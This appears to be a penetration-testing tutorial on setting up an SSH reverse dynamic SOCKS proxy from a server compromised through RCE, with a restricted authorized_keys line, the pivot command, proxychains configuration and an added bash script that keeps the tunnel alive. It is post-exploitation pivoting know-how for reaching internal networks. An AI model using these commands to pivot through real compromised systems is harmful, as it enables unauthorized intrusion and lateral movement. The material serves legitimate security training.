In an SSH reverse dynamic proxy, a remote host connects to a local host over SSH and, by doing so, gives the local host access to the remote network through a SOCKS proxy. Given an RCE on a compromised server, an SSH reverse proxy can be set up in the following manner (set-up = solid lines, usage = dotted lines):

graph TD
    subgraph Pivot
        remote_web[Web on 80] -->|RCE|remote_sshclient[SSH Client]
    end
    
    subgraph Local
        local_ssh[SSH on 22] -->|creates| local_socks[SOCKS Proxy]
        nmap[Nmap] -.->|proxychains| local_socks
    end

    subgraph Target2 [Target 2]
        target_web[Web on 80]
    end

    subgraph Target1 [Target 1]
        target_samba[SMB on 445]
    end

    remote_sshclient -->|proxy setup| local_ssh
    local_socks -.-> local_ssh -.-> remote_sshclient -.-> target_web & target_samba

Demonstration

Start the SSH server on the local machine. Its sshd must permit remote port forwarding (AllowTcpForwarding, which defaults to yes).

Create an SSH key on the remote machine (the one with access to the target network) and add its public half to the local user's authorized_keys file, with extra options that restrict the key to tunnelling/proxying only (replace $REMOTE_IP and the key itself):

from="$REMOTE_IP",command="false",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4cjmvS... mysql@zora

Run the command below on the remote machine to start a SOCKS proxy server on the local machine:

ssh -f -N -R $local_port -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" $local_user@$local_host
  • -f: run in the background
  • -N: do not start a shell or run a remote command
  • -R $local_port: because it names only a listen port and no destination, this option makes the SSH server on the local machine act as a SOCKS4/5 proxy on $local_port; with a destination host:port, -R creates an ordinary reverse tunnel instead. The SOCKS handling is done by the ssh client on the remote machine, which therefore needs OpenSSH 7.6 or later; the local sshd only sees a normal remote forward
  • The -o options remove user interaction and avoid writing the local host's key to the remote machine's known_hosts, at the cost of host-key verification for this session

The proxy server can then be used by any SOCKS-aware client, for example a browser. It can also be used with proxychains by editing /etc/proxychains4.conf (assuming the local port is 1080; the listener speaks both SOCKS4 and SOCKS5, so either socks4 or socks5 works here):

[ProxyList]
# ...
socks4 127.0.0.1 1080
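The whole procedure above, from the restricted authorized_keys line to the proxychains entry, as an added shell example that is not part of the original page. It generates the authorized_keys line for the local sshd (tightening the page's options with `restrict` and a `permitlisten` pin, so a stolen key can open only this one listener), audits an existing line for that pin, builds the ssh command run on the pivot with `ExitOnForwardFailure` and keep-alive options, and wraps it in a reconnect loop. All addresses, ports, paths and the public key are placeholders chosen for the example.

```bash
#!/usr/bin/env bash
# Added example, not from the original page. Helpers for the reverse dynamic
# SOCKS set-up: authorized_keys line for the local sshd, ssh command for the
# pivot, proxychains entry. Hosts, ports, paths and the key are placeholders.
set -eu

# Line appended to the local operator's ~/.ssh/authorized_keys.
#   restrict         disables pty, agent/X11 forwarding, ~/.ssh/rc and all port
#                    forwarding (plus any restriction OpenSSH adds later)
#   port-forwarding  re-enables forwarding, which -R needs
#   permitlisten     pins the -R listener to one port, so the key can only ever
#                    open this SOCKS listener and nothing else
#   from             accept the key only from the pivot's address
#   command          any command a client asks for runs /bin/false instead
authorized_keys_entry() {
    local remote_ip=$1 socks_port=$2 pubkey=$3
    printf 'restrict,port-forwarding,permitlisten="%s",from="%s",command="/bin/false" %s\n' \
        "$socks_port" "$remote_ip" "$pubkey"
}

# Return 0 if an authorized_keys line carries a permitlisten pin, 1 otherwise.
# The page's own line (from=...,command="false",no-pty ...) fails this audit:
# without permitlisten the key may open a -R listener on any port.
audit_entry() {
    local line=$1
    case $line in
        *permitlisten=*) return 0 ;;
        *) return 1 ;;
    esac
}

# Command typed on the pivot. -R with a bare [addr:]port and no destination
# turns the local sshd's listener into a SOCKS4/5 proxy. ExitOnForwardFailure
# makes ssh exit instead of idling if the port is already taken; the
# ServerAlive options drop a dead session so keep_proxy can reconnect.
ssh_proxy_cmd() {
    local socks_port=$1 user=$2 host=$3 key=$4
    printf 'ssh -N -i %s -R 127.0.0.1:%s -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -o ServerAliveCountMax=3 %s@%s\n' \
        "$key" "$socks_port" "$user" "$host"
}

# Keep the proxy up: run ssh in the foreground (no -f) and reconnect on exit.
# Usage on the pivot: keep_proxy 1080 operator 10.10.14.3 /dev/shm/id_ed25519 &
keep_proxy() {
    local cmd
    cmd=$(ssh_proxy_cmd "$@")
    while :; do
        $cmd || true    # word-splitting the generated command is intended
        sleep 10
    done
}

# proxychains4 entry for /etc/proxychains4.conf. socks5 lets proxychains also
# resolve names through the tunnel when proxy_dns is enabled.
proxychains_entry() {
    printf 'socks5 127.0.0.1 %s\n' "$1"
}

# Demo with constructed placeholder values (the key is not a real key).
PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYFORTHISEXAMPLE pivot'
authorized_keys_entry 10.10.10.50 1080 "$PUBKEY"
ssh_proxy_cmd 1080 operator 10.10.14.3 /dev/shm/id_ed25519
proxychains_entry 1080
```

When scanning through the proxy, remember that SOCKS carries TCP connections only: run nmap through proxychains with a connect scan and without host discovery or DNS (`-sT -Pn -n`), since SYN scans, ICMP pings and UDP probes never enter the tunnel and will silently report nothing.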